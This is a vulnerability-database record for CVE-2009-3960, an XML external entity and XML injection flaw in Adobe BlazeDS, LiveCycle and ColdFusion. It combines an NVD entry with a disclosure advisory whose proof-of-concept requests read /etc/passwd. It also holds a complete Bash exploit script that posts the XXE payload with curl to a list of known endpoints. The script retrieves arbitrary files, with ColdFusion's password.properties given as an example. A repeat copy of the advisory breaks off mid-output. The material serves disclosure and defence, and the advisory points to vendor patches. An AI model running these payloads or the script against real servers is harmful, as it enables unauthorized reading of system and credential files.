{"cve": [{"lastseen": "2017-08-16T11:22:43", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in BlazeDS 3.2 and earlier, as used in LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0, allows remote attackers to obtain sensitive information via vectors that are associated with a request, and related to injected tags and external entity references in XML documents.", "modified": "2017-08-15T21:29:00", "published": "2010-02-15T13:30:00", "id": "CVE-2009-3960", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3960", "title": "CVE-2009-3960", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-01T14:30:09", "bulletinFamily": "exploit", "description": "Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities. CVE-2009-3960. Dos exploits for multiple platform", "modified": "2010-02-22T00:00:00", "published": "2010-02-22T00:00:00", "id": "EDB-ID:11529", "href": "https://www.exploit-db.com/exploits/11529/", "type": "exploitdb", "title": "Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities", "sourceData": " ( , ) (,\r\n . `.' ) ('. ',\r\n ). , ('. ( ) (\r\n (_,) .`), ) _ _,\r\n / _____/ / _ \\ ____ ____ _____ \r\n \\____ \\==/ /_\\ \\ _/ ___\\/ _ \\ / \\ \r\n / \\/ | \\\\ \\__( <_> ) Y Y \\\r\n/______ /\\___|__ / \\___ >____/|__|_| /\r\n \\/ \\/.-. 
\\/ \\/:wq \r\n (x.0)\r\n '=.|w|.='\r\n _='`\"``=.\r\n\r\n\t\tpresents..\r\n\r\nMultiple Adobe Products\r\nXML External Entity And XML Injection Vulnerabilities\r\n\r\nCVE: CVE-2009-3960\r\nAdobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html\r\nLink: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n\r\n+-----------+\r\n|Description|\r\n+-----------+\r\n\r\nSecurity-Assessment.com discovered that multiple Adobe \r\nproducts with different Data Services versions are \r\nvulnerable to XML External Entity (XXE) and XML \r\ninjection attacks. \r\nXML external Entities injection allows a wide range of\r\nXML based attacks, including local file disclosure, \r\nTCP scans and Denial of Service condition, which can \r\nbe achieved by recursive entity injection, attribute \r\nblow up and other types of injection. \r\nFor more information about the implications associated\r\nto this vulnerability, refer to the RFC2518 (17.7 \r\nImplications of XML External Entities): \r\nhttp://www.ietf.org/rfc/rfc2518.txt\r\n\r\n+--------------+\r\n|Product Review|\r\n+--------------+\r\n\r\nAdobe Data Services components provide Flex/RIA \r\napplications with data messaging, remoting and \r\nmanagement capabilities.\r\n\r\nThe discovered vulnerabilities affect the HTTPChannel\r\n servlet classes which are respectively \r\n\u201cmx.messaging.channels.HTTPChannel\u201d and \r\n\u201cmx.messaging.channels.SecureHTTPChannel\u201d. These \r\nclasses are part of the Data Services Messaging \r\nclasses and can be found in the \r\nflex-messaging-common.jar Java archive.\r\n\r\nThe HTTPChannel transports data in the AMFX format, \r\nwhich is the text-based XML representation of AMF. \r\nThe HTTPChannel endpoints are defined in the \r\nservices-config.xml file, located within the \r\nFlex/WEB-INF folder of the application. 
\r\nBy default, the HTTPChannel classes are mapped to \r\nthe following endpoints:\r\n\r\n1. http://{server.name}:{server.port}/{context.root}/messagebroker/http\r\n2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure\r\n\r\nNote that the HTTPChannel may be mapped to different \r\nendpoints. \r\nThis depends on the deployed application and the \r\nframework in use (e.g. BlazeDS, Adobe LiveCycle \r\nData Services, etc.).\r\n\r\n+--------------------------------------------+\r\n|Exploitation - XML External Entity Injection|\r\n+--------------------------------------------+\r\n\r\nXML entities can be declared and included within AMFX\r\nrequests passed to the HTTPChannel. The XML parser \r\nparses the payload and successfully processes \r\ninjected entities.\r\n\r\nThe following table shows an example of XML external\r\nentity injection which leads to local file disclosure.\r\nThe AMFX request is sent via the HTTPChannel endpoint\r\nin BlazeDS.\r\n\r\nXML External Entity Injection \u2013 Local File Disclosure\r\nPoC \u2013 BlazeDS \u2013 Request\r\n\r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<!DOCTYPE test [ <!ENTITY x3 SYSTEM \"/etc/passwd\"> ]>\r\n<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">\r\n <body>\r\n <object type=\"flex.messaging.messages.CommandMessage\">\r\n <traits>\r\n <string>body</string><string>clientId</string><string>correlationId</string>\r\n <string>destination</string><string>headers</string><string>messageId</string>\r\n <string>operation</string><string>timestamp</string><string>timeToLive</string>\r\n </traits><object><traits />\r\n </object>\r\n <null /><string /><string />\r\n <object>\r\n <traits>\r\n <string>DSId</string><string>DSMessagingVersion</string>\r\n </traits>\r\n <string>nil</string><int>1</int>\r\n </object>\r\n <string>&x3;</string>\r\n<int>5</int><int>0</int><int>0</int>\r\n </object>\r\n 
</body>\r\n</amfx>\r\n\r\n\r\nXML External Entity Injection \u2013 Local File Inclusion\r\nPoC \u2013 BlazeDS \u2013 Response\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<amfx ver=\"3\"><header name=\"AppendToGatewayUrl\" mustUnderstand=\"true\">\r\n<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>\r\n<body targetURI=\"/onResult\" responseURI=\"\">\r\n<object type=\"flex.messaging.messages.AcknowledgeMessage\">\r\n<traits><string>timestamp</string><string>headers</string>\r\n<string>body</string><string>correlationId</string>\r\n<string>messageId</string><string>timeToLive</string>\r\n<string>clientId</string><string>destination</string>\r\n</traits><double>1.257387140632E12</double><object>\r\n<traits><string>DSMessagingVersion</string>\r\n<string>DSId</string></traits><double>1.0</double>\r\n<string>BDE929FE-270D-3B56-1061-616E8B938429</string>\r\n</object><null/><string>root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\r\nbin:x:2:2:bin:/bin:/bin/sh\r\nsys:x:3:3:sys:/dev:/bin/sh\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/bin/sh\r\nman:x:6:12:man:/var/cache/man:/bin/sh\r\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\r\n[...]\r\n\r\n\r\nThe above injection was successfully tested on \r\nmultiple Adobe products, as shown below:\r\n\r\n1. Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\n2. Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n3. 
ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n4. Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\nThe vendor has released several patches for this \r\nvulnerability. See the Solution section of this \r\ndocument for more information.\r\n\r\n+----------------------------+\r\n|Exploitation - XML Injection|\r\n+----------------------------+\r\n\r\nThe XML parser lacks of proper input and output \r\nvalidation controls. Security-Assessment.com managed\r\nto inject arbitrary XML content which was returned\r\nin the XML response. \r\nThe following table shows an XML injection in the \r\nBlazeDS HTTPChannel. The injected payload becomes \r\npart of the response. In this case, injection is \r\npossible via the \u201cresponseURI\u201d attribute.\r\n\r\nXMLInjection \u2013 BlazeDS - Request\r\n\r\nPOST /samples/messagebroker/http HTTP/1.1\r\nContent-type: application/x-amf\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<amfx ver=\"3\"><body targetURI=\"\" responseURI=\"d\" injectedattr=\"anything\"><null/>\r\n</body></amfx>\r\n\r\nXMLInjection \u2013 BlazeDS - Response\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<amfx ver=\"3\"><body targetURI=\"d\" injectedattr=\"anything\" responseURI=\"\"><null/></body></amfx></body></amfx>\r\n\r\nThe above injection was successfully tested on \r\nmultiple Adobe products, as shown below:\r\n\r\n1. 
Product: Adobe BlazeDS 3.2.0.39\r\nLinux Ubuntu 9.04 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\n2. Adobe LiveCycle Data Services ES2 3.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n3. ColdFusion 9.0\r\nWindows XP SP2 / Tomcat 6.0.14\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/http\r\n{server.name}:{server.port}/\r\n{context.root}/flex2gateway/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n4. Adobe LiveCycle ES2\r\nWindows XP SP2 / IBM Websphere 7.0\r\n\r\nEndpoint URIs:\r\n\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/http\r\n{server.name}:{server.port}/\r\n{context.root}/messagebroker/httpsecure\t\r\n\r\nMethods: POST, GET\r\nProtocols: HTTP, HTTPS\r\n\r\n\r\nThe vendor has released several patches for this \r\nvulnerability. See the Solution section of this \r\ndocument for more information.\r\n\r\n\r\n+--------+\r\n|Solution|\r\n+--------+\r\n\r\nSecurity-Assessment.com follows responsible\r\ndisclosure and promptly contacted the vendor after \r\ndiscovering the issues. The vendor was contacted on \r\nthe 6th November 2009 and a reply was received on the\r\nsame day. The vendor released security patches on \r\nthe 11th February 2010.\r\n \r\nThe security patches can be downloaded at the \r\nfollowing website: \r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb10-05.html\r\n\r\n\r\n+------+\r\n|Credit|\r\n+------+\r\n\r\nDiscovered and advised to Adobe in\r\nNovember 2009 by Roberto Suggi Liverani of Security-\r\nAssessment.com. 
Personal Page: http://malerisch.net/\r\n\r\nFor full details regarding this vulnerability\r\ndownload the PDF from our website:\r\n\r\nhttp://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf\r\n\r\n\r\n+---------+\r\n|Greetings|\r\n+---------+\r\n\r\nBug found at Hack in The Sun 2009, Waiheke Island.\r\n\r\n\r\n+-----------------------------+\r\n|About Security-Assessment.com|\r\n+-----------------------------+\r\n\r\nSecurity-Assessment.com is a New Zealand based world\r\nleader in web application testing, network security\r\nand penetration testing. Security-Assessment.com\r\nservices organisations across New Zealand, Australia,\r\nAsia Pacific, the United States and the United\r\nKingdom.\r\n\r\nRoberto Suggi Liverani\r\n\r\n\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/11529/"}, {"lastseen": "2017-04-11T17:17:42", "bulletinFamily": "exploit", "description": "Adobe Multiple Products - XML Injection File Content Disclosure. CVE-2009-3960. 
Webapps exploit for XML platform", "modified": "2017-04-07T00:00:00", "published": "2017-04-07T00:00:00", "id": "EDB-ID:41855", "href": "https://www.exploit-db.com/exploits/41855/", "type": "exploitdb", "title": "Adobe Multiple Products - XML Injection File Content Disclosure", "sourceData": "#!/bin/bash\r\n#\r\n# Source: https://raw.githubusercontent.com/tsluyter/exploits/master/adobe_xml_inject.sh\r\n# Exploit Title: Adobe XML Injection file content disclosure\r\n# Date: 07-04-2017\r\n# Exploit Author: Thomas Sluyter\r\n# Website: https://www.kilala.nl\r\n# Vendor Homepage: http://www.adobe.com/support/security/bulletins/apsb10-05.html\r\n# Version: Multiple Adobe products\r\n# Tested on: Windows Server 2003, ColdFusion 8.0 Enterprise\r\n# CVE : 2009-3960\r\n#\r\n# Shell script that let's you exploit a known XML injection vulnerability\r\n# in a number of Adobe products, allowing you to read files that are otherwise\r\n# inaccessible. In Metasploit, this is achieved with auxiliary:scanner:adobe_xml_inject\r\n# This script is a Bash implementation of the PoC multiple/dos/11529.txt.\r\n#\r\n# According to the original Metasploit code, this attack works with:\r\n# \t\"Multiple Adobe Products: BlazeDS 3.2 and earlier versions, \r\n# \t LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1,\r\n#\t and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2\"\r\n#\r\n\r\n\r\nPROGNAME=\"$(basename $0)\" # This script\r\nTIMESTAMP=$(date +%y%m%d%H%M) # Used for scratchfiles\r\nSCRATCHFILE=\"/tmp/${PROGNAME}.${TIMESTAMP}\" # Used as generic scratchfile\r\nEXITCODE=\"0\"\t\t\t\t\t# Assume success, changes on errors\r\nCURL=\"/usr/bin/curl\"\t\t\t\t# Other locations are detected with \"which\"\r\n\r\nSSL=\"0\"\t\t\t\t\t\t# Overridden by -s\r\nDEBUG=\"0\"\t\t\t\t\t# Overridden by -d\r\nBREAKFOUND=\"0\"\t\t\t\t\t# Overridden by -b\r\nTARGETHOST=\"\"\t\t\t\t\t# Overridden by -h\r\nTARGETPORT=\"8400\"\t\t\t\t# Overridden by 
-p\r\nREADFILE=\"/etc/passwd\"\t\t\t\t# Overridden by -f\r\n\r\n\r\n################################## OVERHEAD SECTION \r\n# \r\n# Various functions for overhead purposes.\r\n#\r\n\r\n# Defining our own logger function, so we can switch between stdout and syslog.\r\nlogger() {\r\n LEVEL=\"$1\"\r\n MESSAGE=\"$2\"\r\n\r\n\t# You may switch the following two, if you need to log to syslog.\r\n #[[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || /usr/bin/logger -p ${LEVEL} \"$MESSAGE\"\r\n [[ ${DEBUG} -gt 0 ]] && echo \"${LEVEL} $MESSAGE\" || echo \"${LEVEL} $MESSAGE\"\r\n}\r\n\r\n\r\nExitCleanup() {\r\n\tEXITCODE=${1} \r\n\trm -f ${SCRATCHFILE}* >/dev/null 2>&1\r\n\techo \"\"\r\n\texit ${EXITCODE}\r\n}\r\n\r\n\r\n# Many thanks to http://www.linuxjournal.com/content/validating-ip-address-bash-script\r\nValidIP() {\r\n local IP=${1}\r\n local STAT=1\r\n\r\n if [[ ${IP} =~ ^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$ ]]\r\n then\r\n OIFS=$IFS; IFS='.'\r\n IP=(${IP})\r\n IFS=$OIFS\r\n [[ (${IP[0]} -le 255) && (${IP[1]} -le 255) && (${IP[2]} -le 255) && (${IP[3]} -le 255) ]]\r\n stat=$?\r\n fi\r\n return $stat\r\n}\r\n\r\n\r\n# Function to output help information.\r\nshow-help() {\r\n echo \"\"\r\n cat << EOF\r\n ${PROGNAME} [-?] [-d] [-s] [-b] -h host [-p port] [-f file]\r\n\r\n\t -? Show this help message.\r\n\t -d Debug mode, outputs more kruft on stdout.\r\n\t -s Use SSL / HTTPS, instead of HTTP.\r\n\t -b\tBreak on the first valid answer found.\r\n\t -h\tTarget host\r\n\t -p\tTarget port, defaults to 8400.\r\n\t -f\tFull path to file to grab, defaults to /etc/passwd.\r\n\r\n\tThis script exploits a known vulnerability in a set of Adobe applications. Using one \r\n\tof a few possible URLs on the target host (-h) we attempt to read a file (-f) that is\r\n\tnormally inaccessible. \r\n\r\n\tNOTE: Windows paths use \\\\, so be sure to properly escape them when using -f! 
For example:\r\n\t${PROGNAME} -h 192.168.1.20 -f c:\\\\\\\\coldfusion8\\\\\\\\lib\\\\\\\\password.properties\r\n\t${PROGNAME} -h 192.168.1.20 -f 'c:\\\\coldfusion8\\\\lib\\\\password.properties'\r\n\r\n\tThis script relies on CURL, so please have it in your PATH. \r\n\r\nEOF\r\n}\r\n\r\n\r\n# Parsing and verifying the passed parameters.\r\nOPTIND=1 \r\nwhile getopts \"?dsbh:p:f:\" opt; do\r\n case \"$opt\" in\r\n \\?) show-help; ExitCleanup 0 ;;\r\n d) DEBUG=\"1\" ;;\r\n s) SSL=\"1\" ;;\r\n b) BREAKFOUND=\"1\" ;;\r\n h) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n\tValidIP ${OPTARG}; if [[ $? -eq 0 ]]\r\n\tthen TARGETHOST=${OPTARG}\r\n\telse TARGETHOST=$(nslookup ${OPTARG} | grep ^Name | awk '{print $2}')\r\n\t [[ $? -gt 0 ]] && (logger ERROR \"Target host ${TARGETHOST} not found in DNS.\"; ExitCleanup 1)\r\n\tfi ;;\r\n p) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n\tif [[ ! -z $(echo ${OPTARG} | tr -d '[:alnum:]') ]]\r\n\tthen logger ERROR \"Target port ${OPTARG} is incorrect.\"; ExitCleanup 1\r\n\telse TARGETPORT=${OPTARG}\r\n\tfi ;;\r\n f) [[ -z ${OPTARG} ]] && (show-help; ExitCleanup 1)\r\n\tif [[ (-z $(echo ${OPTARG} | grep ^\\/)) && (-z $(echo ${OPTARG} | grep ^[a-Z]:)) ]]\r\n\tthen logger ERROR \"File is NOT specified with full Unix or Windows path.\"; ExitCleanup 1\r\n\telse READFILE=${OPTARG}\r\n\tfi ;;\r\n *) show-help; ExitCleanup 0 ;;\r\n esac\r\ndone\r\n\r\n[[ $(which curl) ]] && CURL=$(which curl) || (logger ERROR \"CURL was not found.\"; ExitCleanup 1)\r\n[[ -z ${TARGETHOST} ]] && (logger ERROR \"Target host was not set.\"; ExitCleanup 1)\r\n\r\n[[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with host/port/file: ${TARGETHOST},${TARGETPORT},${READFILE}.\"\r\n\r\n\r\n################################## GETTING TO WORK\r\n# \r\n#\r\n\r\nPATHLIST=(\"/flex2gateway/\" \"/flex2gateway/http\" \"/flex2gateway/httpsecure\" \\\r\n \"/flex2gateway/cfamfpolling\" \"/flex2gateway/amf\" \"/flex2gateway/amfpolling\" \\\r\n \"/messagebroker/http\" 
\"/messagebroker/httpsecure\" \"/blazeds/messagebroker/http\" \\\r\n \"/blazeds/messagebroker/httpsecure\" \"/samples/messagebroker/http\" \\\r\n \"/samples/messagebroker/httpsecure\" \"/lcds/messagebroker/http\" \\\r\n \"/lcds/messagebroker/httpsecure\" \"/lcds-samples/messagebroker/http\" \\\r\n \"/lcds-samples/messagebroker/httpsecure\")\r\n\r\necho \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?>\" > ${SCRATCHFILE}\r\necho \"<!DOCTYPE test [ <!ENTITY x3 SYSTEM \\\"${READFILE}\\\"> ]>\" >> ${SCRATCHFILE}\r\necho \"<amfx ver=\\\"3\\\" xmlns=\\\"http://www.macromedia.com/2005/amfx\\\">\" >> ${SCRATCHFILE}\r\necho \"<body><object type=\\\"flex.messaging.messages.CommandMessage\\\"><traits>\" >> ${SCRATCHFILE}\r\necho \"<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>\" >> ${SCRATCHFILE}\r\necho \"<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>\" >> ${SCRATCHFILE}\r\necho \"<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>\" >> ${SCRATCHFILE}\r\necho \"<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>\" >> ${SCRATCHFILE}\r\necho \"<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>\" >> ${SCRATCHFILE}\r\n\r\nif [[ ${DEBUG} -gt 0 ]] \r\nthen\r\n logger DEBUG \"XML file sent to target host reads as follows:\"\r\n echo \"======================================\"\r\n cat ${SCRATCHFILE}\r\n echo \"======================================\"\r\n echo \"\"\r\nfi\r\n\r\nlet CONTENTLENGTH=$(wc -c ${SCRATCHFILE} | awk '{print $1}')-1\r\n\r\nfor ADOBEPATH in \"${PATHLIST[@]}\"\r\ndo\r\n [[ ${SSL} -gt 0 ]] && PROTOCOL=\"https\" || PROTOCOL=\"http\"\r\n URI=\"${PROTOCOL}://${TARGETHOST}:${TARGETPORT}${ADOBEPATH}\"\r\n\r\n [[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Proceeding with URI: ${URI}\"\r\n\r\n # Header contents based on a 
tcpdump capture of original exploit being\r\n # run from Metasploit.\r\n HEADER=\"-H \\\"Host: ${TARGETHOST}\\\" -H \\\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\\" -H \\\"Content-Type: application/x-www-form-urlencoded\\\" -H \\\"Content-Length: ${CONTENTLENGTH}\\\"\"\r\n\r\n CURLPOST=\"${CURL} -X POST -k -s --http1.1 ${HEADER} -w \\\"%{http_code}\\\" -d @- ${URI}\"\r\n\r\n [[ ${DEBUG} -gt 0 ]] && logger DEBUG \"Using this CURL command: ${CURLPOST}\"\r\n\r\n # The tr command dikes out any non-ASCII characters which might mess with output.\r\n CURLOUTPUT=$(cat ${SCRATCHFILE} | ${CURLPOST} | tr -cd '\\11\\12\\15\\40-\\176' 2>&1)\r\n\r\n # Output is pretty garbled and the HTTP return code is enclosed in double quotes.\r\n # I need to grab the last 5 chars (includes NULL EOF) and remove the \".\r\n CURLCODE=$(echo ${CURLOUTPUT} | tail -c5 | tr -cd [:digit:])\r\n\r\n if [[ ${DEBUG} -gt 0 ]] \r\n then\r\n\tlogger DEBUG \"CURL was given this HTTP return code: ${CURLCODE}.\"\r\n\tlogger DEBUG \"Output from CURL reads as follows:\"\r\n echo \"======================================\"\r\n\techo \"${CURLOUTPUT}\"\r\n echo \"======================================\"\r\n\techo \"\"\r\n fi\r\n\r\n logger INFO \"${CURLCODE} for ${URI}\"\r\n\r\n if [[ (${CURLCODE} -eq 200) && (! -z $(echo ${CURLOUTPUT} | grep \"<?xml version=\")) ]] \r\n then \r\n\techo \"Read from ${URI}:\"\r\n\techo \"${CURLOUTPUT}\" | sed 's/^[^<]*</</'\r\n\t[[ ${BREAKFOUND} -gt 0 ]] && ExitCleanup 0\r\n fi\r\n\r\n if [[ ${DEBUG} -gt 0 ]] \r\n then \r\n\techo -e \"\\nReady to continue with the next URI? 
[y/n]: \\c\"\r\n \tread READY\r\n\tcase ${READY} in\r\n\t y|Y|yes) logger DEBUG \"Moving to next URI.\"; echo \"\" ;;\r\n\t *) logger DEBUG \"Aborting...\"; ExitCleanup 1 ;;\r\n\tesac\r\n fi\r\ndone\r\n\r\n\r\nExitCleanup 0\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/41855/"}], "packetstorm": [{"lastseen": "2016-12-05T22:21:05", "bulletinFamily": "exploit", "description": "", "modified": "2010-02-23T00:00:00", "published": "2010-02-23T00:00:00", "href": "https://packetstormsecurity.com/files/86558/Adobe-Products-XML-External-Entity-And-XML-Injection.html", "id": "PACKETSTORM:86558", "type": "packetstorm", "title": "Adobe Products XML External Entity And XML Injection", "sourceData": "` \n( , ) (, \n. `.' ) ('. ', \n). , ('. ( ) ( \n(_,) .`), ) _ _, \n/ _____/ / _ \\ ____ ____ _____ \n\\____ \\==/ /_\\ \\ _/ ___\\/ _ \\ / \\ \n/ \\/ | \\\\ \\__( <_> ) Y Y \\ \n/______ /\\___|__ / \\___ >____/|__|_| / \n\\/ \\/.-. \\/ \\/:wq \n(x.0) \n'=.|w|.=' \n_='`\"``=. \n \npresents.. \n \nMultiple Adobe Products \nXML External Entity And XML Injection Vulnerabilities \n \nCVE: CVE-2009-3960 \nAdobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html \nLink: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf \n \n+-----------+ \n|Description| \n+-----------+ \n \nSecurity-Assessment.com discovered that multiple Adobe \nproducts with different Data Services versions are \nvulnerable to XML External Entity (XXE) and XML \ninjection attacks. \nXML external Entities injection allows a wide range of \nXML based attacks, including local file disclosure, \nTCP scans and Denial of Service condition, which can \nbe achieved by recursive entity injection, attribute \nblow up and other types of injection. 
\nFor more information about the implications associated \nto this vulnerability, refer to the RFC2518 (17.7 \nImplications of XML External Entities): \nhttp://www.ietf.org/rfc/rfc2518.txt \n \n+--------------+ \n|Product Review| \n+--------------+ \n \nAdobe Data Services components provide Flex/RIA \napplications with data messaging, remoting and \nmanagement capabilities. \n \nThe discovered vulnerabilities affect the HTTPChannel \nservlet classes which are respectively \n\u201cmx.messaging.channels.HTTPChannel\u201d and \n\u201cmx.messaging.channels.SecureHTTPChannel\u201d. These \nclasses are part of the Data Services Messaging \nclasses and can be found in the \nflex-messaging-common.jar Java archive. \n \nThe HTTPChannel transports data in the AMFX format, \nwhich is the text-based XML representation of AMF. \nThe HTTPChannel endpoints are defined in the \nservices-config.xml file, located within the \nFlex/WEB-INF folder of the application. \nBy default, the HTTPChannel classes are mapped to \nthe following endpoints: \n \n1. http://{server.name}:{server.port}/{context.root}/messagebroker/http \n2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure \n \nNote that the HTTPChannel may be mapped to different \nendpoints. \nThis depends on the deployed application and the \nframework in use (e.g. BlazeDS, Adobe LiveCycle \nData Services, etc.). \n \n+--------------------------------------------+ \n|Exploitation - XML External Entity Injection| \n+--------------------------------------------+ \n \nXML entities can be declared and included within AMFX \nrequests passed to the HTTPChannel. The XML parser \nparses the payload and successfully processes \ninjected entities. \n \nThe following table shows an example of XML external \nentity injection which leads to local file disclosure. \nThe AMFX request is sent via the HTTPChannel endpoint \nin BlazeDS. 
\n \nXML External Entity Injection \u2013 Local File Disclosure \nPoC \u2013 BlazeDS \u2013 Request \n \nPOST /samples/messagebroker/http HTTP/1.1 \nContent-type: application/x-amf \n \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<!DOCTYPE test [ <!ENTITY x3 SYSTEM \"/etc/passwd\"> ]> \n<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\"> \n<body> \n<object type=\"flex.messaging.messages.CommandMessage\"> \n<traits> \n<string>body</string><string>clientId</string><string>correlationId</string> \n<string>destination</string><string>headers</string><string>messageId</string> \n<string>operation</string><string>timestamp</string><string>timeToLive</string> \n</traits><object><traits /> \n</object> \n<null /><string /><string /> \n<object> \n<traits> \n<string>DSId</string><string>DSMessagingVersion</string> \n</traits> \n<string>nil</string><int>1</int> \n</object> \n<string>&x3;</string> \n<int>5</int><int>0</int><int>0</int> \n</object> \n</body> \n</amfx> \n \n \nXML External Entity Injection \u2013 Local File Inclusion \nPoC \u2013 BlazeDS \u2013 Response \n \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<amfx ver=\"3\"><header name=\"AppendToGatewayUrl\" mustUnderstand=\"true\"> \n<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header> \n<body targetURI=\"/onResult\" responseURI=\"\"> \n<object type=\"flex.messaging.messages.AcknowledgeMessage\"> \n<traits><string>timestamp</string><string>headers</string> \n<string>body</string><string>correlationId</string> \n<string>messageId</string><string>timeToLive</string> \n<string>clientId</string><string>destination</string> \n</traits><double>1.257387140632E12</double><object> \n<traits><string>DSMessagingVersion</string> \n<string>DSId</string></traits><double>1.0</double> \n<string>BDE929FE-270D-3B56-1061-616E8B938429</string> \n</object><null/><string>root:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh \nbin:x:2:2:bin:/bin:/bin/sh \nsys:x:3:3:sys:/dev:/bin/sh 
